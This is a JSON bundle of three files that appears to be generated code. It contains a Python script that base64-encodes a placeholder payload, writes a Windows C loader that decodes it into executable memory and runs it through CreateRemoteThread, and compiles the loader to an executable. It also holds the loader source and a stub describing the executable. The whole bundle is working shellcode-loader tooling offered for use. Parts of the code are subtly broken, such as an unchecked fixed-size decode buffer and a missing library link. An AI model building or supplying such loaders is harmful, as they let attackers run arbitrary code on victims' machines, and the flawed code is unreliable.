[
    {
        "file_name": "payload_generator.py",
        "file_content": "import base64\nimport os\n\ndef generate_payload(payload: str) -> str:\n    \"\"\"\n    Encodes the given payload into a base64 string.\n    :param payload: The payload to encode.\n    :return: Base64 encoded payload.\n    \"\"\"\n    encoded_payload = base64.b64encode(payload.encode()).decode()\n    return encoded_payload\n\ndef create_c_file(payload: str, output_file: str) -> None:\n    \"\"\"\n    Creates a C source file with the given payload embedded.\n    :param payload: The base64 encoded payload.\n    :param output_file: The name of the C source file to create.\n    \"\"\"\n    c_code = f\"\"\"\n    #include <windows.h>\n    #include <stdio.h>\n    #include <stdlib.h>\n\n    void execute_payload(const char* payload) {{\n        // Decode the base64 payload\n        char decoded_payload[1024];\n        unsigned char *src = (unsigned char *)payload;\n        unsigned char *dest = (unsigned char *)decoded_payload;\n        size_t len = strlen(payload);\n        BSTR bstr = SysAllocStringByteLen((char*)src, len);\n        size_t out_len;\n        if (CryptStringToBinaryA(payload, len, CRYPT_STRING_BASE64, NULL, &out_len, CRYPT_FORMAT_STR) && out_len > 0) {{\n            CryptStringToBinaryA(payload, len, CRYPT_STRING_BASE64, dest, &out_len, CRYPT_FORMAT_STR);\n        }}\n        SysFreeString(bstr);\n\n        // Execute the decoded payload\n        HANDLE hProcess = GetCurrentProcess();\n        LPVOID pRemoteBuf = VirtualAllocEx(hProcess, NULL, out_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);\n        WriteProcessMemory(hProcess, pRemoteBuf, decoded_payload, out_len, NULL);\n        HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteBuf, NULL, 0, NULL);\n        WaitForSingleObject(hThread, INFINITE);\n        CloseHandle(hThread);\n        VirtualFreeEx(hProcess, pRemoteBuf, 0, MEM_RELEASE);\n    }}\n\n    int main() {{\n        const char* payload = \"{payload}\";\n        execute_payload(payload);\n        return 0;\n    }}\n    \"\"\"\n    with open(output_file, 'w') as file:\n        file.write(c_code)\n\ndef compile_c_file(c_file: str, output_exe: str) -> None:\n    \"\"\"\n    Compiles the given C source file into an executable using the Mingw compiler.\n    :param c_file: The C source file to compile.\n    :param output_exe: The name of the output executable file.\n    \"\"\"\n    os.system(f\"gcc -o {output_exe} {c_file} -lwinmm\")\n\nif __name__ == \"__main__\":\n    payload = \"your_payload_here\"  # Replace with your actual payload\n    encoded_payload = generate_payload(payload)\n    c_file = \"payload.c\"\n    create_c_file(encoded_payload, c_file)\n    compile_c_file(c_file, \"payload.exe\")"
    },
    {
        "file_name": "payload.c",
        "file_content": "// This file is generated by payload_generator.py and contains the C code to execute the payload.\n#include <windows.h>\n#include <stdio.h>\n#include <stdlib.h>\n\nvoid execute_payload(const char* payload) {\n    // Decode the base64 payload\n    char decoded_payload[1024];\n    unsigned char *src = (unsigned char *)payload;\n    unsigned char *dest = (unsigned char *)decoded_payload;\n    size_t len = strlen(payload);\n    BSTR bstr = SysAllocStringByteLen((char*)src, len);\n    size_t out_len;\n    if (CryptStringToBinaryA(payload, len, CRYPT_STRING_BASE64, NULL, &out_len, CRYPT_FORMAT_STR) && out_len > 0) {\n        CryptStringToBinaryA(payload, len, CRYPT_STRING_BASE64, dest, &out_len, CRYPT_FORMAT_STR);\n    }\n    SysFreeString(bstr);\n\n    // Execute the decoded payload\n    HANDLE hProcess = GetCurrentProcess();\n    LPVOID pRemoteBuf = VirtualAllocEx(hProcess, NULL, out_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);\n    WriteProcessMemory(hProcess, pRemoteBuf, decoded_payload, out_len, NULL);\n    HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteBuf, NULL, 0, NULL);\n    WaitForSingleObject(hThread, INFINITE);\n    CloseHandle(hThread);\n    VirtualFreeEx(hProcess, pRemoteBuf, 0, MEM_RELEASE);\n}\n\nint main() {\n    const char* payload = \"your_base64_encoded_payload_here\";  // Replace with the actual base64 encoded payload\n    execute_payload(payload);\n    return 0;\n}"
    },
    {
        "file_name": "payload.exe",
        "file_content": "// This is the compiled executable file generated from payload.c using the Mingw compiler.\n// It contains the machine code to execute the payload on a Windows system."
    }
]